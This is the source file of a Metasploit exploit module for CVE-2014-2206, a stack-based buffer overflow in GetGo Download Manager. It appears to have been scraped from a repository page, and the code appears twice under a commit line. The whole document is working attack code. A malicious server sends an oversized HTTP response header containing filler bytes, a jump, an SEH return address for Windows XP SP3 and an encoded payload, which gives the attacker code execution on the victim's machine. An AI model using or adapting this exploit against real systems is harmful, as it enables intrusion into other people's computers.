metasploit-framework/modules/exploits/windows/browser/getgodm_http_response_bof.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
        overly long HTTP response header.
        By persuading the victim to download a file from a malicious server, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens',  # Vulnerability discovery
          'Gabor Seljan'    # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d",
          'Space'      => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret'    => 0x00280b0b  # CALL DWORD PTR SS:[EBP+30]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 09 2014',
      'DefaultTarget'  => 0))
  end

  def on_client_connect(client)

    sploit  = "HTTP/1.1 200 "
    sploit << rand_text_alpha(target['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
    client.put(sploit)

    sleep(3)
    handler(client)
    service.close_client(client)

  end

end
Add module for CVE-2014-2206 2015-01-14 21:04:30 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Seh`
			`include Msf::Exploit::Remote::TcpServer`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack-based buffer overflow vulnerability in`
			`GetGo Download Manager version 4.9.0.1982 and earlier, caused by an`
			`overly long HTTP response header.`
			`By persuading the victim to download a file from a malicious server, a`
			`remote attacker could execute arbitrary code on the system or cause`
			`the application to crash. This module has been tested successfully on`
			`Windows XP SP3.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Julien Ahrens', # Vulnerability discovery`
			`'Gabor Seljan' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`[ 'EDB', '32132' ],`
			`[ 'OSVDB', '103910' ],`
			`[ 'CVE', '2014-2206' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'ExitFunction' => 'process'`
			`},`
			`'Platform' => 'win',`
			`'Payload' =>`
			`{`
			`'BadChars' => "\x00\x0a\x0d",`
			`'Space' => 2000`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows XP SP3',`
			`{`
			`'Offset' => 4107,`
			`'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Mar 09 2014',`
			`'DefaultTarget' => 0))`
			`end`

			`def on_client_connect(client)`

			`sploit = "HTTP/1.1 200 "`
			`sploit << rand_text_alpha(target['Offset'])`
			`sploit << "\x90\x90\xEB\x06"`
			`sploit << [target.ret].pack('V')`
			`sploit << payload.encoded`

			`print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")`
			`client.put(sploit)`

			`sleep(3)`
			`handler(client)`
			`service.close_client(client)`

			`end`

			`end`